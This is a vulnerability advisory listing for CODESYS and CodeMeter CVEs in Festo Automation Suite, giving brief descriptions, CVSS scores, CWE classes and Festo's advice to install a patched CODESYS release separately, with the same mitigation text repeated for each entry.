View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. 
https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2019-9008 An issue was discovered in 3S-Smart CODESYS V3 through 3.5.12.30. A user with low privileges can take full control over the runtime. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. 
Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-732 Incorrect Permission Assignment for Critical Resource Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2019-9009 An issue was discovered in 3S-Smart CODESYS before 3.5.15.0 . Crafted network packets cause the Control Runtime to crash. 
View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. 
https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-755 Improper Handling of Exceptional Conditions Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2019-9010 An issue was discovered in 3S-Smart CODESYS V3 products. The CODESYS Gateway does not correctly verify the ownership of a communication channel. All variants of the following CODESYS V3 products in all versions prior to v3.5.14.20 that contain the CmpGateway component are affected, regardless of the CPU type or operating system: CODESYS Control for BeagleBone, CODESYS Control for emPC-A/iMX6, CODESYS Control for IOT2000, CODESYS Control for Linux, CODESYS Control for PFC100, CODESYS Control for PFC200, CODESYS Control for Raspberry Pi, CODESYS Control V3 Runtime System Toolkit, CODESYS Gateway V3, CODESYS V3 Development System. 
View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. 
https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-284 Improper Access Control Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2019-9011 In Pilz PMC programming tool 3.x before 3.5.17 (based on CODESYS Development System), an attacker can identify valid usernames. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. 
Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-668 Exposure of Resource to Wrong Sphere Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N CVE-2019-9012 An issue was discovered in 3S-Smart CODESYS V3 products. A crafted communication request may cause uncontrolled memory allocations in the affected CODESYS products and may result in a denial-of-service condition. All variants of the following CODESYS V3 products in all versions prior to v3.5.14.20 that contain the CmpGateway component are affected, regardless of the CPU type or operating system: CODESYS Control for BeagleBone, CODESYS Control for emPC-A/iMX6, CODESYS Control for IOT2000, CODESYS Control for Linux, CODESYS Control for PFC100, CODESYS Control for PFC200, CODESYS Control for Raspberry Pi, CODESYS Control V3 Runtime System Toolkit, CODESYS Gateway V3, CODESYS V3 Development System. 
Affected Products
CODESYS in Festo Automation Suite
Vendor: FESTO, CODESYS
Product Status: known_affected
Product Version:
- Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Development System 3.0: vers:all/*
- Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Development System 3.5.16.10: vers:all/*
- Festo Automation Suite 2.8.0.137 installed with CODESYS Development System 3.0: vers:all/*
- Festo Automation Suite 2.8.0.137 installed with CODESYS Development System 3.5.16.10: vers:all/*

Remediations
Mitigation: FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk. Starting from Festo Automation Suite version 2.8.0.138, CODESYS is no longer bundled with the suite and must be downloaded and installed separately by the customer. Customers are therefore advised to:
- Download the latest, patched version of CODESYS directly from the official CODESYS website.
- Follow the installation and update instructions provided by CODESYS to ensure all security fixes are applied.
- Regularly monitor CODESYS security advisories and apply updates promptly.
- Keep the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.
Fixed versions: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 is the fixed combination for all CVEs. Because CODESYS is no longer bundled, updating the suite to 2.8.0.138 does not by itself fix any of these CVEs; the separately installed CODESYS Development System must be 3.5.21.20 or later.
References: Festo SE & Co. KG security advisory FSA-202601, Several CODESYS vulnerabilities in Festo Automation Suite
- CSAF: https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json
- HTML: https://certvde.com/en/advisories/VDE-2025-108
The affected products, remediations and references above apply to every CVE in FSA-202601.

Relevant CWE: CWE-770 Allocation of Resources Without Limits or Throttling
Metrics: CVSS 3.1 base score 7.5 HIGH, vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2019-9013
An issue was discovered in 3S-Smart CODESYS V3 products. The application may utilize non-TLS based encryption, which results in user credentials being insufficiently protected during transport. All variants of the following CODESYS V3 products in all versions containing the CmpUserMgr component are affected regardless of the CPU type or operating system: CODESYS Control for BeagleBone, CODESYS Control for emPC-A/iMX6, CODESYS Control for IOT2000, CODESYS Control for Linux, CODESYS Control for PFC100, CODESYS Control for PFC200, CODESYS Control for Raspberry Pi, CODESYS Control RTE V3, CODESYS Control RTE V3 (for Beckhoff CX), CODESYS Control Win V3 (also part of the CODESYS Development System setup), CODESYS V3 Simulation Runtime (part of the CODESYS Development System), CODESYS Control V3 Runtime System Toolkit, CODESYS HMI V3.
Relevant CWE: CWE-327 Use of a Broken or Risky Cryptographic Algorithm
Metrics: CVSS 3.1 base score 8.8 HIGH, vector CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2020-10245
CODESYS V3 web server before 3.5.15.40, as used in CODESYS Control runtime systems, has a buffer overflow.
Relevant CWE: CWE-787 Out-of-bounds Write
Metrics: CVSS 3.1 base score 9.8 CRITICAL, vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2020-12067
In Pilz PMC programming tool 3.x before 3.5.17 (based on CODESYS Development System), a user's password may be changed by an attacker without knowledge of the current password.
Relevant CWE: CWE-640 Weak Password Recovery Mechanism for Forgotten Password
Metrics: CVSS 3.1 base score 7.5 HIGH, vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CVE-2020-12068
An issue was discovered in CODESYS Development System before 3.5.16.0. CODESYS WebVisu and CODESYS Remote TargetVisu are susceptible to privilege escalation.
Relevant CWE: CWE-269 Improper Privilege Management
Metrics: CVSS 3.1 base score 6.5 MEDIUM, vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

CVE-2020-12069
In CODESYS V3 products in all versions prior to V3.5.16.0 containing the CmpUserMgr, the CODESYS Control runtime system stores the online communication passwords using a weak hashing algorithm. This can be used by a local attacker with low privileges to gain full control of the device.
Relevant CWE: CWE-916 Use of Password Hash With Insufficient Computational Effort
Metrics: CVSS 3.1 base score 7.8 HIGH, vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2020-14509
Multiple memory corruption vulnerabilities exist in CodeMeter (all versions prior to 7.10) where the packet parser mechanism does not verify length fields. An attacker could send specially crafted packets to exploit these vulnerabilities.
Relevant CWE: CWE-805 Buffer Access with Incorrect Length Value
Metrics: CVSS 3.1 base score 9.8 CRITICAL, vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2020-14513
CodeMeter (all versions prior to 6.81) and the software using it may crash while processing a specifically crafted license file due to unverified length fields.
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS 3.1 base score 7.5 HIGH, vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2020-14515
CodeMeter (all versions prior to 6.90 when using CmActLicense update files with CmActLicense Firm Code) has an issue in the license-file signature checking mechanism, which allows attackers to build arbitrary license files, including forging a license file that passes as a valid license file of an existing vendor. Only CmActLicense update files with CmActLicense Firm Code are affected.
Relevant CWE: CWE-347 Improper Verification of Cryptographic Signature
Metrics: CVSS 3.1 base score 7.5 HIGH, vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CVE-2020-14517
Protocol encryption can be easily broken for CodeMeter (all versions prior to 6.90 are affected; version 6.90 or newer is affected only if CodeMeter Runtime is running as a server) when the server accepts external connections, which may allow an attacker to remotely communicate with the CodeMeter API.
Relevant CWE: CWE-326 Inadequate Encryption Strength
Metrics: CVSS 3.1 base score 9.8 CRITICAL, vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2020-14519
This vulnerability allows an attacker to use the internal WebSockets API of CodeMeter via a specifically crafted JavaScript payload, which may allow alteration or creation of license files when combined with CVE-2020-14515. All versions prior to 7.00 are affected, as is version 7.0 or newer with the affected WebSockets API still enabled; this is especially relevant for systems or devices where a web browser is used to access a web server.
Relevant CWE: CWE-346 Origin Validation Error
Metrics: CVSS 3.1 base score 7.5 HIGH, vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CVE-2020-15806
CODESYS Control runtime system before 3.5.16.10 allows uncontrolled memory allocation.
Relevant CWE: CWE-401 Missing Release of Memory after Effective Lifetime
Metrics: CVSS 3.1 base score 7.5 HIGH, vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2020-16233
An attacker could send a specially crafted packet that could have CodeMeter (all versions prior to 7.10) send back packets containing data from the heap.
Relevant CWE: CWE-404 Improper Resource Shutdown or Release
Metrics: CVSS 3.1 base score 7.5 HIGH, vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE-2020-7052
CODESYS Control V3, Gateway V3, and HMI V3 before 3.5.15.30 allow uncontrolled memory allocation, which can result in a remote denial of service condition.
Relevant CWE: CWE-770 Allocation of Resources Without Limits or Throttling
Metrics: CVSS 3.1 base score 6.5 MEDIUM, vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2021-21863
An unsafe deserialization vulnerability exists in the ComponentModel Profile.FromFile() functionality of CODESYS GmbH CODESYS Development System 3.5.16 and 3.5.17. A specially crafted file can lead to arbitrary command execution. An attacker can provide a malicious file to trigger this vulnerability.
View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. 
https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-502 Deserialization of Untrusted Data Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H CVE-2021-21864 A unsafe deserialization vulnerability exists in the ComponentModel ComponentManager.StartupCultureSettings functionality of CODESYS GmbH CODESYS Development System 3.5.16 and 3.5.17. A specially crafted file can lead to arbitrary command execution. An attacker can provide a malicious file to trigger this vulnerability. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. 
To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-50 Path Equivalence: '//multiple/leading/slash' Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H CVE-2021-21865 A unsafe deserialization vulnerability exists in the PackageManagement.plugin ExtensionMethods.Clone() functionality of CODESYS GmbH CODESYS Development System 3.5.16. A specially crafted file can lead to arbitrary command execution. An attacker can provide a malicious file to trigger this vulnerability. 
View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. 
https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-502 Deserialization of Untrusted Data Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H CVE-2021-21866 A unsafe deserialization vulnerability exists in the ObjectManager.plugin ProfileInformation.ProfileData functionality of CODESYS GmbH CODESYS Development System 3.5.16 and 3.5.17. A specially crafted file can lead to arbitrary command execution. An attacker can provide a malicious file to trigger this vulnerability. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. 
To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-502 Deserialization of Untrusted Data Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H CVE-2021-21867 An unsafe deserialization vulnerability exists in the ObjectManager.plugin ObjectStream.ProfileByteArray functionality of CODESYS GmbH CODESYS Development System 3.5.16 and 3.5.17. A specially crafted file can lead to arbitrary command execution. An attacker can provide a malicious file to trigger this vulnerability. 
View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. 
